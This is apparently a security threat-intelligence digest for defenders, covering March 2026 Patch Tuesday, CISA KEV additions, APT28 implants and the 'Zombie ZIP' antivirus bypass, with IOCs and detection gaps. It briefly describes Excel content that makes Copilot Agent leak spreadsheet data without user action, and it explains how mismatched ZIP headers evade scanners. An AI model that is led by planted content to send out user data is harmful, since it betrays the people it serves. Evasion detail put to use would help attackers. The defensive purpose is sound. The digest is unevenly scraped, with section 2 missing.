1. Microsoft March 2026 Patch Tuesday — Copilot Exfil Zero-Click + 2 Public Zero-Days
Summary
Microsoft’s March 2026 Patch Tuesday lands with 83 CVEs (8 Critical, 75 Important) and one genuinely unusual entry: a zero-click information-disclosure bug in Excel that weaponizes Copilot Agent for unintended data exfiltration — no user interaction required. Alongside it, two publicly disclosed zero-days (SQL Server EoP and .NET DoS) arrived with full public disclosure but no confirmed in-wild exploitation. Most urgently for defenders: the two Critical Office RCE bugs (CVE-2026-26110, CVE-2026-26113) are exploitable via the preview pane.
What’s New (Last 24 Hours)
CVE-2026-26144 (Critical, CVSS 8.6): Excel information-disclosure flaw — exploits Copilot Agent mode to exfiltrate spreadsheet data via unintended network egress. Zero-click: attacker-controlled content in Excel can cause Copilot to beacon outbound without user action.
CVE-2026-21262 (Important, CVSS 8.8): SQL Server EoP — publicly disclosed zero-day, grants sysadmin privileges via improper access control over network. No exploitation confirmed, but public PoC basis exists from researcher disclosure (cross-DB chain article).
O365 exfil rules partially cover CVE-2026-26144 Copilot egress if Copilot beacons via O365 infrastructure; EoP detection covers post-exploitation from CVE-2026-21262 SQL sysadmin grant leading to OS-level escalation. Preview-pane RCE has no direct Splunk match — EDR process ancestry hunting is primary.
sqlps.exe rule catches post-CVE-2026-21262 LOLBin abuse in SQL Server context; no native Copilot exfil or Office preview-pane RCE rule — process ancestry rules required.
CISA added three vulnerabilities to the Known Exploited Vulnerabilities catalog on March 9. Two are well-documented exploitation targets (SolarWinds Web Help Desk deserialization, linked to Warlock ransomware; VMware Workspace One UEM SSRF, part of a coordinated multi-product SSRF campaign). The third — Ivanti EPM CVE-2026-1603 — is an auth bypass credential leak with over 700 internet-exposed instances tracked on Shadowserver, and active exploitation telemetry from IP 103.69.224[.]98. Ivanti has not confirmed exploitation but CISA has.
What’s New (Last 24 Hours)
CVE-2025-26399 (CVSS 9.8) — SolarWinds Web Help Desk AjaxProxy deserialization RCE added to KEV; Warlock ransomware crew attributed. FCEB deadline: March 12, 2026.
CVE-2026-1603 (CVSS 8.6) — Ivanti EPM authentication bypass credential leak. Exploitation telemetry: attacker IP 103.69.224[.]98. FCEB deadline: March 23, 2026.
CVE-2021-22054 (CVSS 7.5) — VMware/Omnissa Workspace One UEM SSRF, FCEB deadline: March 23, 2026.
Actionable Intel
Artifact
Type
ATT&CK Technique
Data Source
How to Use
103.69.224[.]98
IOC (IP)
T1190 (Exploit Public-Facing Application)
Firewall/proxy logs, IDS
Block and alert on inbound connections from this IP to Ivanti EPM instances
HTTP POST to /AjaxProxy endpoint (SolarWinds WHD)
TTP
T1190
Web/app server logs
Alert on POST requests to /AjaxProxy from unexpected IPs; baseline normal access patterns
Java deserialization payload in WHD request body (abnormal Content-Type: application/x-java-serialized-object)
TTP
T1059.007 (JavaScript/Java Exec)
Web app logs, WAF
WAF rule blocking Java deserialization Content-Types against WHD endpoints
Unauthenticated GET to Ivanti EPM credential endpoint (auth bypass path)
TTP
T1078 (Valid Accounts)
Web/app server logs
Alert on unauthenticated access patterns to EPM API endpoints returning credential data
SSRF outbound HTTP from Workspace One UEM server to internal IPs
TTP
T1090.002 (Proxy: External)
Firewall egress logs
Monitor WS1 UEM server for unexpected outbound HTTP to RFC-1918 addresses
Potential Detection Coverage Based on MITRE ATT&CK Technique
Source
Detections
Coverage
Splunk
None found for Ivanti EPM or WS1 UEM directly. Tomcat Session Deserialization Attempt is the closest for WHD deserialization, though it targets Tomcat sessions specifically.
Deserialization detection requires WAF or web log tuning specific to SolarWinds WHD /AjaxProxy endpoint. Ivanti EPM and WS1 UEM have no direct Splunk ESCU rules.
Directly covers CVE-2025-26399 WHD exploitation — monitors for suspicious Java module loads or unexpected child processes spawned by the WHD process. Enable and tune this rule immediately.
Sigma
None found
No direct WHD, Ivanti EPM, or WS1 UEM Sigma rules in the current index. Network-based SSRF detection must be built from proxy/firewall egress baselines.
3. APT28 (Sednit) — BEARDSHELL + COVENANT Dual-Implant Campaign Against Ukrainian Military
Summary
ESET published a new report detailing APT28’s active dual-implant espionage framework targeting Ukrainian military personnel since April 2024. The toolkit consists of three components: BEARDSHELL (PowerShell backdoor with Icedrive cloud C2), COVENANT (heavily-modified .NET post-exploitation framework now using Filen cloud storage for C2 since July 2025), and SLIMAGENT (keylogger/screenshotter/clipboard collector, descended from XAgent). The cloud C2 rotation strategy — pCloud → Koofr → Filen — is a deliberate defender evasion pattern. BEARDSHELL’s opaque-predicate obfuscation is a shared fingerprint with XTunnel from the 2016 DNC hack.
What’s New (Last 24 Hours)
ESET published full technical report “Sednit Reloaded: Back in the Trenches” — first public documentation of BEARDSHELL and the COVENANT/Filen C2 variant
PowerShell-over-hidden-window and obfuscation rules can surface BEARDSHELL’s cloud C2 calls if PowerShell ScriptBlock logging (Event 4104) is enabled. No BEARDSHELL-specific or Icedrive/Filen domain rule exists — add custom network IOC alert for cloud C2 domains.
High-entropy PowerShell detection can catch BEARDSHELL’s obfuscated dispatch commands. No COVENANT/Filen or SLIMAGENT-specific rules — keylogging HTML output pattern and cloud C2 domain rules must be added manually.
Direct match — Sigma has a dedicated COVENANT launcher detection rule. APT28’s modified COVENANT variant may partially bypass it (custom network protocol), but this is a strong starting point. Supplement with DLL-side masquerade detection for eapphost.dll/tcpiphlpsvc.dll.
4. Zombie ZIP — AV/EDR Bypass via Malformed Archive Headers (CVE-2026-0866)
Summary
Security researcher Chris Aziz (Bombadil Systems) published a PoC technique called “Zombie ZIP” that bypasses 50 out of 51 AV engines on VirusTotal by deliberately malforming ZIP headers. The trick: set Method=0 (STORED) in the ZIP header while the actual payload is DEFLATE-compressed. AV engines trust the header and scan raw bytes — seeing compressed noise with no signatures. A purpose-built loader ignores the declared method and decompresses as DEFLATE, recovering the payload perfectly. CERT/CC published advisory VU#976247 and assigned CVE-2026-0866. A public PoC with sample archives is live on GitHub. This is not a standalone exploit — it’s a delivery container that requires a secondary loader.
Configure SEG to quarantine ZIP attachments that fail extraction by standard tools (unsupported method error); add aggressive archive inspection mode
ZIP extraction tool returns “unsupported method” or CRC error on incoming attachment
Behavioral
T1566.001 (Spearphishing Attachment)
Email gateway logs
Alert on email attachment ZIP files that generate extraction errors at the gateway — these may be Zombie ZIPs
Custom loader process decompressing a ZIP file that standard tools cannot open
TTP
T1140 (Deobfuscate/Decode Files or Information)
EDR behavioral
Flag processes that open files that fail unzip/7-Zip validation; anomalous archive decompression from non-standard processes
Presence of zombie-zip PoC artifacts on disk
File
T1027.013
EDR file creation
Hunt for files matching Zombie ZIP structure: ZIP magic bytes PK\x03\x04, Method=\x00\x00 (stored), payload fails standard extraction
Potential Detection Coverage Based on MITRE ATT&CK Technique
Source
Detections
Coverage
Splunk
None found
No Splunk ESCU rule addresses malformed ZIP/archive bypass evasion. Detection must be built at the email gateway and EDR behavioral layer — custom SPL hunting for processes opening files that fail standard decompression.
Elastic
None found with direct relevance
Masquerading rules cover filename-based evasion but not ZIP header malformation. A custom Elastic rule monitoring for archive extraction failures or anomalous decompression processes would be required.
Sigma
None found
No Sigma rule covers malformed archive header bypass. This is a detection gap; a new Sigma rule detecting ZIP Method=0 with compressed data (via file inspection tools or EDR telemetry) would fill this gap.